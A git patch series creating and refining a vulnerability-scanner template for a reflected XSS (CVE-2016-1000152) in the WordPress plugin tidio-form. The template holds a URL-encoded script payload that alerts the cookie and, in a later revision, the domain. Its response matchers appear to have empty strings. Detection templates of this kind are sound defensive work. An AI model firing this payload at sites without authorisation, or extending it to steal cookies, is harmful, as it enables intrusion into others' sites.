From fa127ec3514d0f4536f3c890e1f1923d2545fb82 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 05:57:54 +0700 Subject: [PATCH 1/3] Create CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000152.yaml diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml new file mode 100644 index 0000000000..0c8455b1b7 --- /dev/null +++ b/cves/2016/CVE-2016-1000152.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000152 + +info: + name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4c83f2341b5f761dd9a138d735219c2037a53c77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 17:53:22 +0530 Subject: [PATCH 2/3] Update CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 0c8455b1b7..7c3165b3f0 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -4,19 +4,20 @@ info: name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 07ee00e38d1de3e7cc5ee33ad9d518d3b6411dfb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 19:34:36 +0700 Subject: [PATCH 3/3] Update CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 7c3165b3f0..2dd82e5904 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -1,7 +1,7 @@ id: CVE-2016-1000152 info: - name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) + name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: Reflected XSS in wordpress plugin tidio-form v1.0